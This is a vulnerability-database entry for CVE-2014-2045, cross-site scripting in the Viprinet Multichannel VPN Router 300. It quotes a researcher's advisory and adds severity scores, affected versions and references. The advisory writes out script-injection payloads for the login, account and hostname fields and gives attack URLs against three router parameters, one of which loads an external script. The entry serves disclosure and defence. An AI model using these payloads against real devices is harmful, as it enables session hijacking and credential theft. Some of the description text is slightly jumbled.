Sign-up

ID

VAR-201701-0533


CVE

CVE-2014-2045


TITLE

Viprinet Europe Multichannel VPN Router 300 Cross-Site Scripting Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2016-01187 // CNNVD: CNNVD-201602-369

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in the old and new interfaces in Viprinet Multichannel VPN Router 300 allow remote attackers to inject arbitrary web script or HTML via the username when (1) logging in or (2) creating an account in the old interface, (3) username when creating an account in the new interface, (4) hostname in the old interface, (5) inspect parameter in the config module, (6) commands parameter in the atcommands tool, or (7) host parameter in the ping tool. ViprinetEuropeMultichannelVPNRouter300 is a multi-channel VPN router product from ViprinetEurope, Germany. A cross-site scripting vulnerability exists in ViprinetEuropeMultichannelVPNRouter300. An attacker could exploit this vulnerability to inject arbitrary web scripts or HTML. An HTML-injection vulnerability 3. Multiple security-bypass vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials and to launch other attacks, perform man-in-the-middle attacks and impersonate trusted servers or bypass certain security restrictions and perform unauthorized actions. This is a normal feature of many applications, however, in this instance the application failed to restrict the type of data that could be stored and also failed to sanitise it, meaning that it could not be safely rendered by the browser. Stored cross-site scripting could be triggered by: Attempting to login with a username of `<script>alert(1)</script>’ (affects `old’ interface and results in post-authentication cross-site Scripting when a legitimate administrator views the realtime log) Creating an account with a username of `<script>alert(1)</script>’ (affects both `old’ and `new’ interfaces once created) Setting the device’s hostname to `<script>alert(1)</script>’ (affects `old’ interface once created) A number of locations were identified as being vulnerable to reflective attacks, including: http://<host>/exec?module=config&sessionid=<sessionid>&inspect=%3Cscript%20src=http://localhost:9090%3E%3C/script%3E http://<host>/exec?tool=atcommands&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&commands=%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://<host>/exec?tool=ping&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&host=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pingcount=3&databytes=56 The inclusion of session IDs in all URLs partially mitigates the reflective cross-site scripting but could itself be considered a vulnerability since it is included in referred headers and log files. These are simply some examples of how this attack might be performed, and the it is believed that both the `old’ and `new’ web applications are systemically vulnerable to this. Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2045/ Copyright: Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information

Trust: 2.61

sources: NVD: CVE-2014-2045 // JVNDB: JVNDB-2014-008187 // CNVD: CNVD-2016-01187 // BID: 82583 // VULHUB: VHN-69984 // PACKETSTORM: 135613

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2016-01187

AFFECTED PRODUCTS

vendor:viprinetmodel:multichannel vpn router 300scope:eqversion:2013070830

Trust: 1.6

vendor:viprinetmodel:multichannel vpn router 300scope:eqversion:2013080900

Trust: 1.6

vendor:viprinet europemodel:multichannel vpn router 300scope: - version: -

Trust: 0.8

vendor:viprinet europemodel:multichannel vpn router 300scope:eqversion:2013070830

Trust: 0.8

vendor:viprinet europemodel:multichannel vpn router 300scope:eqversion:2013080900

Trust: 0.8

vendor:viprinetmodel:europe multichannel vpn routerscope:eqversion:300

Trust: 0.6

sources: CNVD: CNVD-2016-01187 // JVNDB: JVNDB-2014-008187 // CNNVD: CNNVD-201602-369 // NVD: CVE-2014-2045

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-2045
value: MEDIUM

Trust: 1.0

NVD: CVE-2014-2045
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2016-01187
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201602-369
value: MEDIUM

Trust: 0.6

VULHUB: VHN-69984
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2014-2045
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2016-01187
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-69984
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2014-2045
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2016-01187 // VULHUB: VHN-69984 // JVNDB: JVNDB-2014-008187 // CNNVD: CNNVD-201602-369 // NVD: CVE-2014-2045

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-69984 // JVNDB: JVNDB-2014-008187 // NVD: CVE-2014-2045

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201602-369

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 135613 // CNNVD: CNNVD-201602-369

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2014-008187

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-69984

PATCH
title:Multichannel VPN Router 300/310url:https://www.viprinet.com/en/products/multichannel-vpn-router-modular/multichannel-vpn-router-300-310
Trust: 0.8
title:Patch for ViprinetEuropeMultichannelVPNRouter300 Cross-Site Scripting Vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/71678
Trust: 0.6
sources:
            
            
            CNVD: CNVD-2016-01187 // 
            
            
            
            JVNDB: JVNDB-2014-008187

EXTERNAL IDS
db:NVDid:CVE-2014-2045
Trust: 3.5
db:PACKETSTORMid:135613
Trust: 1.8
db:EXPLOIT-DBid:39407
Trust: 1.7
db:BIDid:82583
Trust: 1.5
db:JVNDBid:JVNDB-2014-008187
Trust: 0.8
db:CNVDid:CNVD-2016-01187
Trust: 0.6
db:CNNVDid:CNNVD-201602-369
Trust: 0.6
db:VULHUBid:VHN-69984
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2016-01187 // 
            
            
            
            VULHUB: VHN-69984 // 
            
            
            
            BID: 82583 // 
            
            
            
            JVNDB: JVNDB-2014-008187 // 
            
            
            
            PACKETSTORM: 135613 // 
            
            
            
            CNNVD: CNNVD-201602-369 // 
            
            
            
            NVD: CVE-2014-2045

REFERENCES
url:https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2045/
Trust: 2.6
url:http://seclists.org/fulldisclosure/2016/feb/8
Trust: 2.0
url:https://www.exploit-db.com/exploits/39407/
Trust: 1.7
url:http://packetstormsecurity.com/files/135613/viprinet-multichannel-vpn-router-300-cross-site-scripting.html
Trust: 1.7
url:http://www.securityfocus.com/bid/82583
Trust: 1.2
url:http://www.securityfocus.com/archive/1/537441/100/0/threaded
Trust: 1.1
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2045
Trust: 0.8
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2045
Trust: 0.8
url:http://www.securityfocus.com/archive/1/archive/1/537441/100/0/threaded
Trust: 0.6
url:https://www.viprinet.com/en/products/multichannel-vpn-router-modular/multichannel-vpn-router-300-310
Trust: 0.3
url:http://<host>/exec?tool=ping&sessionid=<sessionid>&sourceobject=waninterfacelist.object__0&module=configtools&host=%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e&pingcount=3&databytes=56
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2014-2045
Trust: 0.1
url:http://<host>/exec?tool=atcommands&sessionid=<sessionid>&sourceobject=waninterfacelist.object__0&module=configtools&commands=%3cscript%3ealert%281%29%3c%2fscript%3e
Trust: 0.1
url:http://<host>/exec?module=config&sessionid=<sessionid>&inspect=%3cscript%20src=http://localhost:9090%3e%3c/script%3e
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2016-01187 // 
            
            
            
            VULHUB: VHN-69984 // 
            
            
            
            BID: 82583 // 
            
            
            
            JVNDB: JVNDB-2014-008187 // 
            
            
            
            PACKETSTORM: 135613 // 
            
            
            
            CNNVD: CNNVD-201602-369 // 
            
            
            
            NVD: CVE-2014-2045

CREDITS
Tim Brown
Trust: 1.0
sources:
            
            
            BID: 82583 // 
            
            
            
            PACKETSTORM: 135613 // 
            
            
            
            CNNVD: CNNVD-201602-369

SOURCES
db:CNVDid:CNVD-2016-01187
db:VULHUBid:VHN-69984
db:BIDid:82583
db:JVNDBid:JVNDB-2014-008187
db:PACKETSTORMid:135613
db:CNNVDid:CNNVD-201602-369
db:NVDid:CVE-2014-2045

LAST UPDATE DATE
2025-04-20T23:20:07.688000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2016-01187date:2016-02-23T00:00:00
db:VULHUBid:VHN-69984date:2018-10-09T00:00:00
db:BIDid:82583date:2016-07-05T21:22:00
db:JVNDBid:JVNDB-2014-008187date:2017-01-31T00:00:00
db:CNNVDid:CNNVD-201602-369date:2017-02-04T00:00:00
db:NVDid:CVE-2014-2045date:2025-04-20T01:37:25.860

SOURCES RELEASE DATE
db:CNVDid:CNVD-2016-01187date:2016-02-23T00:00:00
db:VULHUBid:VHN-69984date:2017-01-20T00:00:00
db:BIDid:82583date:2016-02-03T00:00:00
db:JVNDBid:JVNDB-2014-008187date:2017-01-31T00:00:00
db:PACKETSTORMid:135613date:2016-02-05T19:02:22
db:CNNVDid:CNNVD-201602-369date:2016-02-19T00:00:00
db:NVDid:CVE-2014-2045date:2017-01-20T15:59:00.147